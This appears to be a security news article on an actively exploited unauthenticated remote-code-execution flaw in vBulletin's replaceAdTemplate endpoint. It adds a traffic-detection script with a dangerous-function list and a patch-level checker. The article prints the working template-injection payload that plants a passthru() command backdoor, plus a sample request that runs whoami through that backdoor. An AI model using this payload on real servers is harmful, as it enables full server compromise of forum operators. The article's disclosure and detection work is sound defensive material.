Thursday, April 30, 2026

Hackers Actively Exploiting Critical vBulletin Vulnerability in the Wild

A newly disclosed and actively exploited unauthenticated Remote Code Execution (RCE) vulnerability in vBulletin forum software threatens thousands of online communities worldwide.

The flaw, impacting vBulletin versions 5.0.0 through 6.0.3, allows attackers to execute arbitrary commands on vulnerable servers, posing a severe risk to data integrity and site control.

Technical Analysis: Unauthenticated RCE in vBulletin

The vulnerability, recently uncovered by the security research group Karma(In)Security, abuses the ajax/api/ad/replaceAdTemplate endpoint, which accepts a template fragment and compiles it without requiring authentication. Because the condition attribute of a vBulletin <vb:if> tag is compiled into PHP, an attacker can smuggle a PHP expression into it through this endpoint. The payload observed in live attacks is shockingly simple:

<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>

When sent via a crafted HTTP POST request, this fragment is compiled and stored as a backdoor template: every later request to it runs whatever is passed in the cmd POST parameter through passthru(), giving the attacker remote shell access to the server. Writing the function name as a quoted string ("passthru"(...)) uses PHP's string-callable call form, which is what lets the payload get past vBulletin's filtering of function names in template conditions.

Sample malicious POST request triggering the planted backdoor (the earlier request that injects the template is not reproduced here):

POST /ajax/api/ad/replaceAdTemplate HTTP/1.1
Host: vulnerable-forum.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: application/x-www-form-urlencoded

cmd=whoami
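To turn the two request shapes above into something a defender can run over traffic, here is an added detection example (not code from the article, the researchers, or vBulletin). It flags requests that reach the replaceAdTemplate endpoint and, separately, form bodies that carry a <vb:if condition=...> fragment calling a dangerous function by its quoted name, which is the pattern of the observed payload. The log lines and request bodies are constructed samples; the form parameter name "template" used for the injected fragment, and the idea that the endpoint path might also appear inside the body, are assumptions rather than facts taken from the article.

```python
import re
from urllib.parse import unquote_plus

# Endpoint named in the advisory. It is checked in both the URI and the decoded
# body; the body check is an assumption (a router parameter might carry the path).
ENDPOINT = "ajax/api/ad/replaceAdTemplate"

# PHP allows calling a function by a quoted name: "passthru"($x). A string
# literal directly followed by "(" is that call form.
STRING_CALLABLE = re.compile(r'''(["'])([A-Za-z_][A-Za-z0-9_]*)\1\s*\(''')
VB_IF = re.compile(r"<vb:if\s+condition\s*=", re.IGNORECASE)
DANGEROUS = {"passthru", "system", "exec", "shell_exec", "popen",
             "proc_open", "eval", "assert"}

# Apache/nginx combined-format access log line (request bodies are not logged there).
ACCESS_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def analyze_request(uri, body):
    """Return the indicators found in one request (URI plus raw form body)."""
    decoded_uri = unquote_plus(uri)
    decoded_body = unquote_plus(body)
    findings = []
    if ENDPOINT in decoded_uri or ENDPOINT in decoded_body:
        findings.append("endpoint")
    if VB_IF.search(decoded_body):
        findings.append("vb_if_condition")
    for match in STRING_CALLABLE.finditer(decoded_body):
        name = match.group(2).lower()
        findings.append("string_callable:" + name)
        if name in DANGEROUS:
            findings.append("dangerous_function:" + name)
    return findings


def classify(uri, body):
    """Collapse the indicators into a verdict suitable for alerting."""
    findings = analyze_request(uri, body)
    dangerous = any(f.startswith("dangerous_function:") for f in findings)
    if "vb_if_condition" in findings and dangerous:
        return "exploit_attempt"      # a template that plants a command backdoor
    if "endpoint" in findings:
        return "suspicious_endpoint"  # e.g. cmd=... sent to an already planted backdoor
    return "clean"


def scan_access_log(lines):
    """Pick out requests to the vulnerable endpoint from access-log lines."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m and ENDPOINT in unquote_plus(m.group(4)):
            hits.append({"ip": m.group(1), "time": m.group(2), "method": m.group(3),
                         "uri": m.group(4), "status": m.group(5)})
    return hits


# Constructed samples, not captured traffic. The form-encoded body decodes to
# template=<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>; the parameter
# name "template" is an assumption.
EXPLOIT_BODY = ("template=%3Cvb%3Aif+condition%3D%27%22passthru%22%28%24_POST"
                "%5B%22cmd%22%5D%29%27%3E%3C%2Fvb%3Aif%3E")
LOG_LINES = [
    '198.51.100.23 - - [26/May/2025:10:14:02 +0000] "POST /ajax/api/ad/replaceAdTemplate HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/May/2025:10:15:11 +0000] "GET /forum/index.php HTTP/1.1" 200 1833 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(classify("/ajax/api/ad/replaceAdTemplate", EXPLOIT_BODY))  # exploit_attempt
    print(classify("/ajax/api/ad/replaceAdTemplate", "cmd=whoami"))  # suspicious_endpoint
    print(classify("/search.php", "q=hello+world"))                   # clean
    for hit in scan_access_log(LOG_LINES):
        print(hit["ip"], hit["method"], hit["uri"])
```

Access logs only show that the endpoint was hit, so the body checks need a source that records POST bodies (a WAF audit log or reverse proxy); a hit on the endpoint alone is still worth an alert on a forum that has not been patched, since legitimate clients have no reason to call it unauthenticated.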

Live Exploitation Confirmed

On May 26, 2025, honeypot systems detected several exploitation attempts from a Polish IP address (195.3.221.137), confirming real-world attacks.

Evidence suggests attackers are using the proof-of-concept code released by researchers, rather than automated attack frameworks.

The vulnerability has drawn attention in the security community due to the existence of a Nuclei template and increasing scan activity observed in industry logs, such as those tracked by the SANS Internet Storm Center. Despite the patch being available for over a year (in versions 6.0.3 Patch Level 1, 6.0.2 Patch Level 1, 6.0.1 Patch Level 1, and 5.7.5 Patch Level 3), many forums remain dangerously exposed.

Urgent Mitigation

While the CVE assignments (CVE-2025-48827 and CVE-2025-48828) are pending public documentation, the implications are clear: admins must update vBulletin immediately to the fixed patch level for their branch (6.0.3 PL1, 6.0.2 PL1, 6.0.1 PL1 or 5.7.5 PL3) or, ideally, to the current 6.1.1 release. Delay in patching risks complete server compromise.
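Because the fix depends on both the release and its patch level, a plain "is it above 6.0.3?" check gives the wrong answer for 6.0.3 PL1 and for 5.7.5 PL3. The following added example (not code from the article or from vBulletin) encodes the affected range and the fixed patch levels listed above, parses version strings in both the "PL1" and "Patch Level 1" spellings, and states what an administrator should do with the version they read off their installation. The recommended target 6.1.1 is taken from the article; treating a version string with no patch level as patch level 0 is an assumption.

```python
import re

# Affected range and fixed patch levels as listed in the article.
AFFECTED_MIN = (5, 0, 0)
AFFECTED_MAX = (6, 0, 3)
FIXED_PATCH_LEVEL = {
    (6, 0, 3): 1,   # 6.0.3 Patch Level 1
    (6, 0, 2): 1,   # 6.0.2 Patch Level 1
    (6, 0, 1): 1,   # 6.0.1 Patch Level 1
    (5, 7, 5): 3,   # 5.7.5 Patch Level 3
}
RECOMMENDED = "6.1.1"

# Accepts "6.0.3", "6.0.3 PL1" and "6.0.3 Patch Level 1" (case-insensitive).
VERSION_RE = re.compile(
    r"^\s*(\d+)\.(\d+)\.(\d+)\s*(?:(?:PL|Patch\s*Level)\s*(\d+))?\s*$", re.IGNORECASE)


def parse_version(text):
    """'6.0.3 Patch Level 1' -> ((6, 0, 3), 1). No patch level counts as 0 (assumption)."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError("unrecognised vBulletin version string: %r" % text)
    base = tuple(int(x) for x in m.group(1, 2, 3))
    level = int(m.group(4)) if m.group(4) else 0
    return base, level


def is_vulnerable(text):
    """True when the installation still needs the fix for this issue."""
    base, level = parse_version(text)
    if base < AFFECTED_MIN or base > AFFECTED_MAX:
        return False           # outside the affected range (e.g. 6.1.x)
    fixed = FIXED_PATCH_LEVEL.get(base)
    if fixed is None:
        return True            # affected release with no patch level published for it
    return level < fixed       # fixed only from that patch level upwards


def advise(text):
    """One-line remediation advice for the given version string."""
    base, _ = parse_version(text)
    if not is_vulnerable(text):
        return "not affected"
    fixed = FIXED_PATCH_LEVEL.get(base)
    if fixed is not None:
        return f"apply {base[0]}.{base[1]}.{base[2]} PL{fixed} or upgrade to {RECOMMENDED}"
    return f"upgrade to {RECOMMENDED}"


if __name__ == "__main__":
    for v in ("6.0.3", "6.0.3 PL1", "5.7.5 Patch Level 2", "6.0.0", "6.1.1"):
        print(f"{v:24s} vulnerable={is_vulnerable(v)!s:5s} -> {advise(v)}")
```

Releases that have a patch level available (6.0.1 to 6.0.3 and 5.7.5) can be fixed in place; any other affected release has no patch level to apply and needs the jump to 6.1.1.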
